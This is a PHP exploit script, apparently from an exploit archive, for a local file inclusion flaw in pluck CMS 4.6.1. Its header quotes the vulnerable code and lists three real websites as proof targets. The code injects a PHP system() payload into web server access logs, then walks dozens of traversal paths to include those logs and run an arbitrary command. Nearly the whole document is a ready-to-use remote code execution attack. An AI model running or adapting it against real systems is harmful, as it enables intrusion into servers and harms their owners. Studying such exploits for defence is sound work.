<?php
/*
pluck v 4.6.1 LFI exploit
autor : Alfons Luja
Vuln is in \\data\\modules\\blog\\module_pages_site.php
...
$includepage = \'blog_include.php\';
//Only set \'view post\'-page if a post has been specified
if (isset($_GET[\'post\'])) {
//Check if post exists, and include information
if (file_exists(\'data/settings/modules/blog/posts/\'.$_GET[\'post\'])) {
include(\'data/settings/modules/blog/posts/\'.$_GET[\'post\']);
$module_page[\'viewpost\'] = $post_title;
}
}
...
Nothing to comment ;x
Greetings: For all friends and obvious for me ;D
pr00f:
http://www.kilgarvangaa.com//data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
http://www.southtrewlogcabins.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
http://www.seanhood.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
*/
if($argc < 4) die(\"Use host path command [www.penatgon.gov /pluck ls l]\\n\");
set_time_limit(0);
error_reporting(0);
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];
//add something if not w00rking ;x
$shell = array(
\"<?php echo(\' e[Ho_trip \');system(\'$command\');echo(\' d34th_trip\'); ?>\",
\"../apache/logs/access.log\",
\"../../apache/logs/access.log\",
\"../../../apache/logs/access.log\",
\"../../../../apache/logs/access.log\",
\"../../../../../apache/logs/access.log\",
\"../../../../../../apache/logs/access.log\",
\"../../../../../../../apache/logs/access.log\",
\"../../../../../../../../apache/logs/access.log\",
\"../../../../../../../../../apache/logs/access.log\",
\"../../../../../../../../../../apache/logs/access.log\",
\"../../../../../../../../../../../apache/logs/access.log\",
\"../var/log/httpd/access.log\",
\"../../var/log/httpd/access.log\",
\"../../../var/log/httpd/access.log\",
\"../../../../var/log/httpd/access.log\",
\"../../../../../var/log/httpd/access.log\",
\"../../../../../../var/log/httpd/access.log\",
\"../../../../../../../var/log/httpd/access.log\",
\"../../../../../../../../var/log/httpd/access.log\",
\"../../../../../../../../../var/log/httpd/access.log\",
\"../../../../../../../../../../var/log/httpd/access.log\",
\"../../../../../../../../../../../var/log/httpd/access.log\",
\"../var/log/apache/access.log\",
\"../../var/log/apache/access.log\",
\"../../../var/log/apache/access.log\",
\"../../../../var/log/apache/access.log\",
\"../../../../../var/log/apache/access.log\",
\"../../../../../../var/log/apache/access.log\",
\"../../../../../../../var/log/apache/access.log\",
\"../../../../../../../../var/log/apache/access.log\",
\"../../../../../../../../../var/log/apache/access.log\",
\"../../../../../../../../../../var/log/apache/access.log\",
\"../../../../../../../../../../../var/log/apache/access.log\",
\"../usr/local/apache2/logs/access.log\",
\"../../usr/local/apache2/logs/access.log\",
\"../../../usr/local/apache2/logs/access.log\",
\"../../../../usr/local/apache2/logs/access.log\",
\"../../../../../usr/local/apache2/logs/access.log\",
\"../../../../../../usr/local/apache2/logs/access.log\",
\"../../../../../../../usr/local/apache2/logs/access.log\",
\"../../../../../../../../usr/local/apache2/logs/access.log\",
\"../../../../../../../../../usr/local/apache2/logs/access.log\",
\"../../../../../../../../../../usr/local/apache2/logs/access.log\",
\"../../../../../../../../../../../usr/local/apache2/logs/access.log\",
);
function _hdr($int){ //Mia³o nie byæ file_get_contents
global $shell,$host,$path;
$header .= \"GET /$host/$path/$shell[$int] HTTP/1.1\\r\\n\";
$header .= \"Host: $host\\r\\n\";
$header .= \"User-Agent: _echo [ru] (Win6.66; @)\\r\\n\";
$header .= \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\";
$header .= \"Accept-Language: en-us,en;q=0.5\\r\\n\";
$header .= \"Accept-Encoding: gzip,deflate\\r\\n\";
$header .= \"Connection: close\\r\\n\\r\\n\";
return $header;
}
function _inject($hosts,$ports){
$hnd = fsockopen($hosts,$ports,$errno, $errstr, 30);
if(!$hnd) die(\"Injection errr $errstr\\n\");
fwrite($hnd,_hdr(0));
fclose($hnd);
}
function _result($data){
$ret = explode(\' e[Ho_trip \',$data);
if($ret[1] != \"\"){
for($i = 1;$i<count($ret);$i++){
$ret_2 = explode(\' d34th_trip\',$ret[$i]);
if($i - count($ret) == -1){
if($ret_2[0] != \"\"){
echo($ret_2[0]);
} else {
die(\"Exploit failed!!\\n\");
}
}
}
}
}
function _exploit($hosts,$paths){
global $shell;
$rets = \"\";
$count = count($shell);
for($i=1;$i<$count;$i++){
$tab = file_get_contents(\"http://\".$hosts.\"/\".$paths.\"/data/modules/blog/module_pages_site.php?post=$shell[$i]\");
_result($tab);
}
}
echo(\"---- pluck v 4.6.1 -----\\n\\n\".
\"Autor: Alfons Luja\\n\".
\"Target: $host\\n\".
\"Path: $path\\n\".
\"Port: $port\\n\".
\"COM: $command\\n\".
\"Ex: poc.php www.target.com 80 pluck \\\"dir\\\"\\n\\n\");
_inject($host,$port);
_exploit($host,$path);
?>
京公网安备 11010502034610号
暂无评论